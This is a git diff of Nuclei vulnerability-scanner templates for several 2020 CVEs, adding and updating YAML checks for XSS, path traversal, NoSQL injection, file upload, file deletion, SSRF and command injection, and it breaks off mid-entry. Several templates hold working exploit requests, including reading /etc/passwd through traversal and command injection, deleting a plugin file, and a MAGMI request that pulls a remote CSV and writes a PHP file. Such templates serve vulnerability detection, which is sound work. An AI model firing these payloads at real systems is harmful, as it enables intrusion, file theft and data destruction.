a/poc/cve/cve-2020-29597.yaml b/poc/cve/cve-2020-29597.yaml index 250129bae7..cf65d76241 100644 --- a/poc/cve/cve-2020-29597.yaml +++ b/poc/cve/cve-2020-29597.yaml @@ -6,21 +6,32 @@ info: severity: critical description: | IncomCMS 2.0 has a an insecure file upload vulnerability in modules/uploader/showcase/script.php. This allows unauthenticated attackers to upload files into the server. + impact: | + Successful exploitation of this vulnerability can result in unauthorized access, data leakage, and potential remote code execution. + remediation: | + Apply the latest security patch or update to a version that addresses the vulnerability. reference: - https://github.com/Trhackno/CVE-2020-29597 - https://nvd.nist.gov/vuln/detail/CVE-2020-29597 - https://github.com/M4DM0e/m4dm0e.github.io/blob/gh-pages/_posts/2020-12-07-incom-insecure-up.md - https://m4dm0e.github.io/2020/12/07/incom-insecure-up.html + - https://github.com/trhacknon/CVE-2020-29597 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-29597 cwe-id: CWE-434 + epss-score: 0.78448 + epss-percentile: 0.9817 + cpe: cpe:2.3:a:incomcms_project:incomcms:2.0:*:*:*:*:*:*:* metadata: - verified: "true" - tags: cve,cve2020,incomcms,fileupload,intrusive + verified: true + max-request: 2 + vendor: incomcms_project + product: incomcms + tags: cve,cve2020,incomcms,fileupload,intrusive,incomcms_project -requests: +http: - raw: - | POST /incom/modules/uploader/showcase/script.php HTTP/1.1 @@ -33,12 +44,10 @@ requests: {{randstr_2}} ------WebKitFormBoundaryBEJZt0IK73M2mAbt-- - - | GET /upload/userfiles/image/{{randstr_1}}.png HTTP/1.1 Host: {{Hostname}} - req-condition: true matchers-condition: and matchers: - type: word @@ -50,5 +59,4 @@ requests: part: body_2 words: - '{{randstr_2}}' - -# Enhanced by CS 06/06/2022 +# digest: 4a0a00473045022100ab5832fbca2af41f73d0a9dd5b7e6a5d11131ec0ef50cf26f0613d515b953718022046f83ee4202dafd7b1a1b379f116c6d1a31b1ebe1dc45a9e355c444f9e84e968:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2020-35749.yaml b/poc/cve/cve-2020-35749.yaml index 94c2be7907..7ad59e3734 100644 --- a/poc/cve/cve-2020-35749.yaml +++ b/poc/cve/cve-2020-35749.yaml @@ -1,13 +1,15 @@ id: CVE-2020-35749 info: - name: Simple Job Board < 2.9.4 - Authenticated Path Traversal Leading to Arbitrary File Download + name: Simple Job Board < 2.9.4 -Arbitrary File Retrieval (Authenticated) author: cckuailong severity: high description: The plugin does not validate the sjb_file parameter when viewing a resume, allowing authenticated user with the download_resume capability (such as HR users) to download arbitrary files from the web-server via a path traversal attack. reference: - https://wpscan.com/vulnerability/eed3bd69-2faf-4bc9-915c-c36211ef9e2d - https://nvd.nist.gov/vuln/detail/CVE-2020-35749 + - https://docs.google.com/document/d/1TbePkrRGsczepBaJptIdVRvfRrjiC5hjGg_Vxdesw6E/edit?usp=sharing + - http://packetstormsecurity.com/files/161050/Simple-JobBoard-Authenticated-File-Read.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N cvss-score: 7.7 diff --git a/poc/cve/cve-2020-35774.yaml b/poc/cve/cve-2020-35774.yaml new file mode 100644 index 0000000000..72a6ca1ba6 --- /dev/null +++ b/poc/cve/cve-2020-35774.yaml @@ -0,0 +1,42 @@ +id: CVE-2020-35774 + +info: + name: twitter-server Cross-Site Scripting + author: pikpikcu + severity: medium + description: | + twitter-server before 20.12.0 is vulnerable to cross-site scripting in some configurations. The vulnerability exists in the administration panel of twitter-server in the histograms component via server/handler/HistogramQueryHandler.scala. + reference: + - https://advisory.checkmarx.net/advisory/CX-2020-4287 + - https://nvd.nist.gov/vuln/detail/CVE-2020-35774 + - https://github.com/twitter/twitter-server/commit/e0aeb87e89a6e6c711214ee2de0dd9f6e5f9cb6c + - https://github.com/twitter/twitter-server/compare/twitter-server-20.10.0...twitter-server-20.12.0 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-35774 + cwe-id: CWE-79 + tags: cve,cve2020,xss,twitter-server + +requests: + - method: GET + path: + - "{{BaseURL}}/admin/histograms?h=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&fmt=plot_cdf&log_scale=true" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + + - type: status + status: + - 200 + + - type: word + part: header + words: + - text/html + +# Enhanced by mp on 2022/04/04 diff --git a/poc/cve/cve-2020-35848.yaml b/poc/cve/cve-2020-35848.yaml index 5d48c3664f..703b0efb37 100644 --- a/poc/cve/cve-2020-35848.yaml +++ b/poc/cve/cve-2020-35848.yaml @@ -5,33 +5,24 @@ info: author: dwisiswant0 severity: critical description: Agentejo Cockpit prior to 0.12.0 is vulnerable to NoSQL Injection via the newpassword method of the Auth controller, which is responsible for displaying the user password reset form. - remediation: | - Upgrade Agentejo Cockpit to version 0.12.0 or later to mitigate this vulnerability. reference: - https://swarm.ptsecurity.com/rce-cockpit-cms/ - https://nvd.nist.gov/vuln/detail/CVE-2020-35848 - https://getcockpit.com/ - https://github.com/agentejo/cockpit/commit/2a385af8d80ed60d40d386ed813c1039db00c466 - - https://github.com/agentejo/cockpit/commit/33e7199575631ba1f74cba6b16b10c820bec59af classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-35848 cwe-id: CWE-89 - epss-score: 0.71273 - epss-percentile: 0.97736 - cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: agentejo - product: cockpit tags: cve,cve2020,nosqli,sqli,cockpit,injection -http: +requests: - method: POST path: - "{{BaseURL}}/auth/newpassword" - + headers: + Content-Type: application/json body: | { "token": { @@ -39,11 +30,10 @@ http: } } - headers: - Content-Type: application/json matchers: - type: regex part: body regex: - 'string\([0-9]{1,3}\)(\s)?"rp-([a-f0-9-]+)"' -# digest: 490a00463044022075d03d73e66908e21caf87fc35087b14321fa4499bc70896a4d1b4bced28944b02207028b8d5471341bcff9a320cb4fd8c6666f86a676bb4956c6553c8030e51cc38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/04/28 diff --git a/poc/cve/cve-2020-35951.yaml b/poc/cve/cve-2020-35951.yaml new file mode 100644 index 0000000000..72b76b1df4 --- /dev/null +++ b/poc/cve/cve-2020-35951.yaml @@ -0,0 +1,71 @@ +id: CVE-2020-35951 + +info: + name: Wordpress Quiz and Survey Master <7.0.1 - Arbitrary File Deletion + author: princechaddha + severity: critical + description: Wordpress Quiz and Survey Master <7.0.1 allows users to delete arbitrary files such as wp-config.php file, which could effectively take a site offline and allow an attacker to reinstall with a WordPress instance under their control. This occurred via qsm_remove_file_fd_question, which allowed unauthenticated deletions (even though it was only intended for a person to delete their own quiz-answer files). + reference: + - https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-35951 + - https://wpscan.com/vulnerability/10348 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H + cvss-score: 9.9 + cve-id: CVE-2020-35951 + cwe-id: CWE-306 + tags: cve,cve2020,wordpress,wp-plugin + +requests: + - raw: + - | + GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1 + Host: {{Hostname}} + + - | + GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1 + Host: {{Hostname}} + + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBJ17hSJBjuGrnW92 + + + ------WebKitFormBoundaryBJ17hSJBjuGrnW92 + Content-Disposition: form-data; name="action" + + qsm_remove_file_fd_question + ------WebKitFormBoundaryBJ17hSJBjuGrnW92 + Content-Disposition: form-data; name="file_url" + + {{fullpath}}wp-content/plugins/quiz-master-next/README.md + ------WebKitFormBoundaryBJ17hSJBjuGrnW92-- + + - | + GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: regex + name: fullpath + internal: true + part: body + group: 1 + regex: + - "not found in ([/a-z_]+)wp" + + req-condition: true + matchers-condition: and + matchers: + + - type: word + words: + - '{"type":"success","message":"File removed successfully"}' + part: body + + - type: dsl + dsl: + - "contains((body_1), '# Quiz And Survey Master') && status_code_4==301 && !contains((body_4), '# Quiz And Survey Master')" + +# Enhanced by mp on 2022/04/28 diff --git a/poc/cve/cve-2020-36510.yaml b/poc/cve/cve-2020-36510.yaml index 5fec7dce2a..2617428d5d 100644 --- a/poc/cve/cve-2020-36510.yaml +++ b/poc/cve/cve-2020-36510.yaml @@ -6,19 +6,31 @@ info: severity: medium description: | WordPress 15Zine before 3.3.0 is vulnerable to reflected cross-site scripting because the theme does not sanitize the cbi parameter before including it in the HTTP response via the cb_s_a AJAX action. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Update WordPress 15Zine to version 3.3.0 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/d1dbc6d7-7488-40c2-bc38-0674ea5b3c95 - https://nvd.nist.gov/vuln/detail/CVE-2020-36510 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2020-36510 cwe-id: CWE-79 + epss-score: 0.00106 + epss-percentile: 0.42122 + cpe: cpe:2.3:a:codetipi:15zine:*:*:*:*:*:wordpress:*:* metadata: - verified: false - tags: xss,wordpress,wp-theme,wp,cve,cve2020 + verified: "false" + max-request: 1 + vendor: codetipi + product: 15zine + framework: wordpress + tags: cve2020,cve,xss,wordpress,wp-theme,wp,wpscan,codetipi -requests: +http: - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' @@ -38,5 +50,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/08/14 +# digest: 4a0a004730450220446ad83f55668169ec8d86cdb517ce3c0a10e62b8842feac2099a3ba1e40bbfb022100bd74e57eca1f513a0e248cc3bce01375a08d0f07161fd3ccf9980af8759c6c18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2020-5405.yaml b/poc/cve/cve-2020-5405.yaml new file mode 100644 index 0000000000..73a539a58a --- /dev/null +++ b/poc/cve/cve-2020-5405.yaml @@ -0,0 +1,30 @@ +id: CVE-2020-5405 + +info: + name: Spring Cloud Directory Traversal + author: harshbothra_ + severity: medium + description: Spring Cloud Config, versions 2.2.x prior to 2.2.2, versions 2.1.x prior to 2.1.7, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server + module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead a directory traversal attack. + reference: + - https://pivotal.io/security/cve-2020-5405 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N + cvss-score: 6.5 + cve-id: CVE-2020-5405 + cwe-id: CWE-22 + tags: cve,cve2020,lfi,springcloud + +requests: + - method: GET + path: + - '{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd' + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:.*:0:0:" + part: body diff --git a/poc/cve/cve-2020-5776.yaml b/poc/cve/cve-2020-5776.yaml index 0c7e24a866..e6ea2bc21c 100644 --- a/poc/cve/cve-2020-5776.yaml +++ b/poc/cve/cve-2020-5776.yaml @@ -5,26 +5,28 @@ info: author: dwisiswant0 severity: high description: Currently, all versions of MAGMI are vulnerable to CSRF due to the lack of CSRF tokens. RCE (via phpcli command) is possible in the event that a CSRF is leveraged against an existing admin session for MAGMI. - - # Due to the lack of CSRF tokens, RCE (via phpcli command) is possible - # in the event that a CSRF is leveraged against an existing admin session for MAGMI. - # At the time of this advisory, no patch exists for this issue. - # Ref: - # - https://nvd.nist.gov/vuln/detail/CVE-2020-5776 + reference: + - https://www.tenable.com/security/research/tra-2020-51 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2020-5776 + cwe-id: CWE-352 + tags: cve,cve2020,magmi,magento requests: - raw: - | POST /magmi/web/magmi_saveprofile.php HTTP/1.1 Host: {{Hostname}} - Content-type: application/x-www-form-urlencoded + Content-Type: application/x-www-form-urlencoded Connection: close profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses= - | POST /magmi/web/magmi_run.php HTTP/1.1 Host: {{Hostname}} - Content-type: application/x-www-form-urlencoded + Content-Type: application/x-www-form-urlencoded Connection: close engine=magmi_productimportengine%3AMagmi_ProductImportEngine&ts=1598879870&run=import&logfile=progress.txt&profile=default&mode=update diff --git a/poc/cve/cve-2020-6171.yaml b/poc/cve/cve-2020-6171.yaml new file mode 100644 index 0000000000..0e963ed130 --- /dev/null +++ b/poc/cve/cve-2020-6171.yaml @@ -0,0 +1,38 @@ +id: CVE-2020-6171 + +info: + name: CLink Office v2 XSS + author: pikpikcu + severity: medium + description: | + A cross-site scripting (XSS) vulnerability in the index page of the CLink Office 2.0 management console allows remote attackers to inject arbitrary web script or HTML via the lang parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2020-6171 + - https://www.deepcode.ca/index.php/2020/04/07/cve-2020-xss-in-clink-office-v2/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-6171 + cwe-id: CWE-79 + tags: cve,cve2020,xss,clink-office + +requests: + - method: GET + path: + - "{{BaseURL}}?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1" + + matchers-condition: and + matchers: + - type: word + words: + - '">' + part: body + + - type: status + status: + - 200 + + - type: word + part: header + words: + - text/html diff --git a/poc/cve/cve-2020-6308.yaml b/poc/cve/cve-2020-6308.yaml new file mode 100644 index 0000000000..492514c99f --- /dev/null +++ b/poc/cve/cve-2020-6308.yaml @@ -0,0 +1,30 @@ +id: CVE-2020-6308 + +info: + name: Unauthenticated Blind SSRF in SAP + author: madrobot + severity: medium + description: SAP BusinessObjects Business Intelligence Platform (Web Services) versions - 410, 420, 430, allows an unauthenticated attacker to inject arbitrary values as CMS parameters to perform lookups on the internal network which is otherwise not accessible externally. On successful exploitation, attacker can scan internal network to determine internal infrastructure and gather information for further attacks like remote file inclusion, retrieve server files, bypass firewall and force the vulnerable server to perform malicious requests, resulting in a Server-Side Request Forgery vulnerability. + reference: + - https://github.com/InitRoot/CVE-2020-6308-PoC + - https://launchpad.support.sap.com/#/notes/2943844 + - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=558632196 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2020-6308 + cwe-id: CWE-918 + tags: cve,cve2020,sap,ssrf,oast,blind + +requests: + - method: POST + path: + - '{{BaseURL}}/AdminTools/querybuilder/logon?framework=' + + body: aps={{interactsh-url}}&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp + + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" diff --git a/poc/cve/cve-2020-7136.yaml b/poc/cve/cve-2020-7136.yaml index ec212016bf..1702a00b91 100644 --- a/poc/cve/cve-2020-7136.yaml +++ b/poc/cve/cve-2020-7136.yaml @@ -1,17 +1,19 @@ id: CVE-2020-7136 info: - name: HPE Smart Update Manager - Remote Unauthorized Access + name: HPE Smart Update Manager < 8.5.6 - Remote Unauthorized Access author: gy741 severity: critical - description: A security vulnerability in HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access. Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP). + description: HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access. reference: - https://www.tenable.com/security/research/tra-2020-02 - https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=emr_na-hpesbmu03997en_us - https://nvd.nist.gov/vuln/detail/CVE-2020-7136 + - https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbmu03997en_us + remediation: Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP). classification: - cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2020-7136 cwe-id: CWE-288 tags: cve,cve2020,hp,auth-bypass,hpe @@ -47,3 +49,5 @@ requests: part: body regex: - '"sessionId":"([a-z0-9.]+)"' + +# Enhanced by mp on 2022/04/29 diff --git a/poc/cve/cve-2020-7247.yaml b/poc/cve/cve-2020-7247.yaml index b67f74c07c..a54d564c36 100644 --- a/poc/cve/cve-2020-7247.yaml +++ b/poc/cve/cve-2020-7247.yaml @@ -1,18 +1,21 @@ id: CVE-2020-7247 info: - name: OpenSMTPD 6.4.0 - 6.6.1 Remote Code Execution + name: OpenSMTPD 6.4.0-6.6.1 - Remote Code Execution author: princechaddha severity: critical + description: | + OpenSMTPD versions 6.4.0 - 6.6.1 are susceptible to remote code execution. smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the "uncommented" default configuration. The issue exists because of an incorrect return value upon failure of input validation. reference: - https://www.openwall.com/lists/oss-security/2020/01/28/3 - https://nvd.nist.gov/vuln/detail/CVE-2020-7247 + - https://github.com/openbsd/src/commit/9dcfda045474d8903224d175907bfc29761dcb45 + - http://www.openwall.com/lists/oss-security/2020/01/28/3 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2020-7247 cwe-id: CWE-78,CWE-755 - description: "OpenSMTPD versions 6.4.0 - 6.6.1 are susceptible to remote code execution. smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the \"uncommented\" default configuration. The issue exists because of an incorrect return value upon failure of input validation." tags: cve,cve2020,smtp,opensmtpd,network,rce,oast network: @@ -46,4 +49,4 @@ network: words: - "Message accepted for delivery" -# Enhanced by mp on 2022/04/04 +# Enhanced by mp on 2022/04/29 diff --git a/poc/cve/cve-2020-7796.yaml b/poc/cve/cve-2020-7796.yaml index bf0dae4846..8c94eb0c98 100644 --- a/poc/cve/cve-2020-7796.yaml +++ b/poc/cve/cve-2020-7796.yaml @@ -1,18 +1,20 @@ id: CVE-2020-7796 info: - name: Zimbra Collaboration Suite (ZCS) - SSRF + name: Zimbra Collaboration Suite < 8.8.15 Patch 7 - Server-Side Request Forgery author: gy741 severity: critical - description: Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 allows SSRF when WebEx zimlet is installed and zimlet JSP is enabled. + description: Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 is susceptible to server-side request forgery when WebEx zimlet is installed and zimlet JSP is enabled. reference: - https://www.adminxe.com/2183.html - tags: cve,cve2020,zimbra,ssrf,oast + - https://nvd.nist.gov/vuln/detail/CVE-2020-7796 + - https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2020-7796 cwe-id: CWE-918 + tags: cve,cve2020,zimbra,ssrf,oast requests: - raw: @@ -25,3 +27,5 @@ requests: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + +# Enhanced by mp on 2022/04/29 diff --git a/poc/cve/cve-2020-7943.yaml b/poc/cve/cve-2020-7943.yaml index 1f5454db70..10c78e21ad 100644 --- a/poc/cve/cve-2020-7943.yaml +++ b/poc/cve/cve-2020-7943.yaml @@ -2,16 +2,17 @@ id: CVE-2020-7943 info: name: Puppet Server and PuppetDB sensitive information disclosure - severity: high author: c-sh0 + severity: high description: Puppet Server and PuppetDB provide useful performance and debugging information via their metrics API endpoints, which may contain sensitive information reference: - https://puppet.com/security/cve/CVE-2020-7943 - https://nvd.nist.gov/vuln/detail/CVE-2020-7943 - https://tickets.puppetlabs.com/browse/PDB-4876 + - https://puppet.com/security/cve/CVE-2020-7943/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2020-7943 cwe-id: CWE-276 tags: cve,cve2020,puppet,exposure diff --git a/poc/cve/cve-2020-7980.yaml b/poc/cve/cve-2020-7980.yaml new file mode 100644 index 0000000000..b3a656ea66 --- /dev/null +++ b/poc/cve/cve-2020-7980.yaml @@ -0,0 +1,55 @@ +id: CVE-2020-7980 + +info: + name: Satellian Intellian Aptus Web <= 1.24 - Remote Command Execution + author: ritikchaddha + severity: critical + description: 'Intellian Aptus Web 1.24 allows remote attackers to execute arbitrary OS commands via the Q field within JSON data to the cgi-bin/libagent.cgi URI. NOTE: a valid sid cookie for a login to the intellian default account might be needed.' + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system. + remediation: | + Upgrade to a patched version of Satellian Intellian Aptus Web (version > 1.24). + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2020-7980 + - https://sku11army.blogspot.com/2020/01/intellian-aptus-web-rce-intellian.html + - https://github.com/Xh4H/Satellian-CVE-2020-7980 + - http://packetstormsecurity.com/files/156143/Satellian-1.12-Remote-Code-Execution.html + - https://github.com/0xT11/CVE-POC + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-7980 + cwe-id: CWE-78 + epss-score: 0.97015 + epss-percentile: 0.99726 + cpe: cpe:2.3:a:intelliantech:aptus_web:1.24:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: intelliantech + product: aptus_web + shodan-query: http.title:"Intellian Aptus Web" + tags: cve2020,cve,intellian,aptus,packetstorm,satellian,rce,intelliantech + +http: + - raw: + - | + POST /cgi-bin/libagent.cgi?type=J HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + Cookie: ctr_t=0; sid=123456789 + + {"O_": "A", "F_": "EXEC_CMD", "S_": 123456789, "P1_": {"Q": "cat /etc/passwd", "F": "EXEC_CMD"}, "V_": 1} + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 +# digest: 490a00463044022031d1966241ed308968ef852360775530e3798312c51bffd3e2011ddff009f30d0220601bed4b817baee1e1404f921e52a663759eec3f11e4a03015b7cb839fa416e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2020-8115.yaml b/poc/cve/cve-2020-8115.yaml index 34775d22a2..aecdd7b672 100644 --- a/poc/cve/cve-2020-8115.yaml +++ b/poc/cve/cve-2020-8115.yaml @@ -2,8 +2,19 @@ id: CVE-2020-8115 info: name: Revive Adserver XSS - author: madrobot & dwisiswant0 + author: madrobot,dwisiswant0 severity: medium + description: | + A reflected XSS vulnerability has been discovered in the publicly accessible afr.php delivery script of Revive Adserver <= 5.0.3 by Jacopo Tediosi. There are currently no known exploits: the session identifier cannot be accessed as it is stored in an http-only cookie as of v3.2.2. On older versions, however, under specific circumstances, it could be possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script was printed back without proper escaping in a JavaScript context, allowing an attacker to execute arbitrary JS code on the browser of the victim. + reference: + - https://hackerone.com/reports/775693 + - https://www.revive-adserver.com/security/revive-sa-2020-001/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-8115 + cwe-id: CWE-79 + tags: cve,cve2020,xss requests: - method: GET diff --git a/poc/cve/cve-2020-8194.yaml b/poc/cve/cve-2020-8194.yaml new file mode 100644 index 0000000000..a2146b54f0 --- /dev/null +++ b/poc/cve/cve-2020-8194.yaml @@ -0,0 +1,39 @@ +id: CVE-2020-8194 + +info: + name: Citrix ADC & NetScaler Gateway Reflected Code Injection + author: dwisiswant0 + severity: medium + description: Reflected code injection in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and + 10.2.7 allows the modification of a file download. + reference: + - https://support.citrix.com/article/CTX276688 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N + cvss-score: 6.5 + cve-id: CVE-2020-8194 + cwe-id: CWE-94 + tags: cve,cve2020,citrix + +requests: + - raw: + - | + GET /menu/guiw?nsbrand=1&protocol=nonexistent.1337">&id=3&nsvpx=phpinfo HTTP/1.1 + Host: {{Hostname}} + Cookie: startupapp=st + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + words: + - "application/x-java-jnlp-file" + part: header + + - type: status + status: + - 200 diff --git a/poc/cve/cve-2020-8497.yaml b/poc/cve/cve-2020-8497.yaml index 14601fef0a..ac9da84e0f 100644 --- a/poc/cve/cve-2020-8497.yaml +++ b/poc/cve/cve-2020-8497.yaml @@ -9,8 +9,8 @@ info: - https://k4m1ll0.com/cve-2020-8497.html - https://nvd.nist.gov/vuln/detail/CVE-2020-8497 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.30 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 cve-id: CVE-2020-8497 cwe-id: CWE-306 tags: cve,cve2020,fms,artica diff --git a/poc/cve/cve-2020-8644.yaml b/poc/cve/cve-2020-8644.yaml index 9f91299c9c..ddeb6aaefd 100644 --- a/poc/cve/cve-2020-8644.yaml +++ b/poc/cve/cve-2020-8644.yaml @@ -55,4 +55,4 @@ requests: status: - 200 -# Enhanced by mp on 2022/07/07 +# Enhanced by mp on 2022/07/07 \ No newline at end of file diff --git a/poc/cve/cve-2020-8654.yaml b/poc/cve/cve-2020-8654.yaml index 6e915a1b20..9f41122e5c 100644 --- a/poc/cve/cve-2020-8654.yaml +++ b/poc/cve/cve-2020-8654.yaml @@ -1,36 +1,39 @@ id: CVE-2020-8654 info: - name: EyesOfNetwork 5.3 - Authenticated RCE + name: EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution author: praetorian-thendrickson severity: high - description: EyesOfNetwork version 5.1-5.3 is vulnerable to multiple exploits. Version 5.3 is vulnerable to CVE-2020-8654 (authenticated rce), CVE-2020-8655 (privesc), CVE-2020-8656 (SQLi - API version before 2.4.2), and 2020-8657 (hardcoded api key). Versions 5.1-5.3 are vulnerable to CVE-2020-9465 (SQLi). + description: EyesOfNetwork 5.1 to 5.3 contains SQL injection and remote code execution vulnerabilities. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. See also CVE-2020-8655, CVE-2020-8656, CVE-2020-8657, and CVE-2020-9465. + impact: | + Successful exploitation of these vulnerabilities could allow an attacker to 